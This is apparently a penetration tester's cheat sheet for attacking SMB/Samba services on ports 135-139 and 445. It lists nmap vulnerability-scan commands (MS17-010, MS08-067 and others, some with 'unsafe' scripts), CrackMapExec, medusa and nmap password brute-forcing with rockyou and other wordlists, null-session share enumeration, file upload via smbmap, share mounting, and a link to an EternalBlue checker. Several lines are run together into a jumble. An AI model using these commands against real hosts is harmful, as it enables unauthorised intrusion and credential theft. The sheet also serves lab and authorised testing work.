SMB-Samba 135-139 445

#NMAP

#run this first
nmap --script=smb2-security-mode.nse -p 445 192.168.10.0/24

sudo nmap -v -p 139,445 -oG smb.txt 10.11.1.8
sudo nmap --script nbstat.nse 10.11.1.5
sudo nmap --script smb-os-discovery 10.11.1.5
sudo nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.5 (variation)
nmap --script smb-enum-shares -p139,445 10.11.1.5
sudo nmap --script smb-vuln* 10.11.1.5
sudo nmap -v -p 139,445 --script=smb-vuln* --script-args=unsafe=1 10.11.1.5 (variation)
sudo nmap -A -p 135 --open 10.11.1.0/24 -oG nmap135
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p 445 10.11.1.0/24#if user/pass are known
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10 #one liner

#Metasploit use auxiliary/scanner/smb/smb_enumshares use auxiliary/scanner/smb/smb_lookupsid #Banner grab nc -nv 10.11.1.5 135 #Crackmapexec

IntroductionCrackMapExec ~ CME WIKI

All things CME , syntax help

crackmapexec smb --help (smb specific) crackmapexec smb 10.11.1.128 crackmapexec smb 10.11.1.128 -u 'username' -p 'password' crackmapexec smb 10.11.1.128 -u "DJ" -p /usr/share/dirb/wordlists/mutations_common.txt crackmapexec smb 10.11.1.136 -u root -p /usr/share/wordlists/rockyou.txt crackmapexec smb 10.11.1.146 -u 'guest' -p '' #null session crackmapexec smb 10.11.1.146 -u '' -p '' --shares #listing available shares #rpcclient rpcclient -U "" -N 10.11.1.5 #Ridenum ridenum.py 10.10.10.10 500 50000 dict.txt #dictionary bruteforce of users #Null session Windows: net use \\10.10.10.10\ "" /u:"" Linux: smbclient -L //10.10.10.10 #nmblookup nmblookup -A 10.11.1.5

#nbtscan nbtscan 10.11.1.5 #Smbmap smbmap -H 10.11.1.5 -P 135 Login with creds: smbmap -u "root" -p "123456" -R Bob -H 10.11.1.136 -P 445 smbclient -L 10.11.1.5 smbclient //10.11.1.5/guest smbclient --no-pass -L //10.11.1.146 #null session

smbmap -H //10.10.10.10/ --upload test.txt /SHARENAME/test.txt #upload file

#Bruteforcing

medusa -h 10.11.1.111 -u redcliff -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
nmap -p445 --script smb-brute --script-args userdb=user.txt,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
nmap –script smb-brute 10.11.1.111

#smbget smbget -rR smb://192.168.101.83/sambashare -U guest #Eternalchecker.py https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternal_checker.py clone repo and fire off against target , POC for Eternal Blue Vuln #Mounting shares Creating a temporary share folder in /tmp (kali) sudo mkdir /tmp/share Mounting the share sudo mount -t cifs //10.11.1.146/SusieShare /tmp/share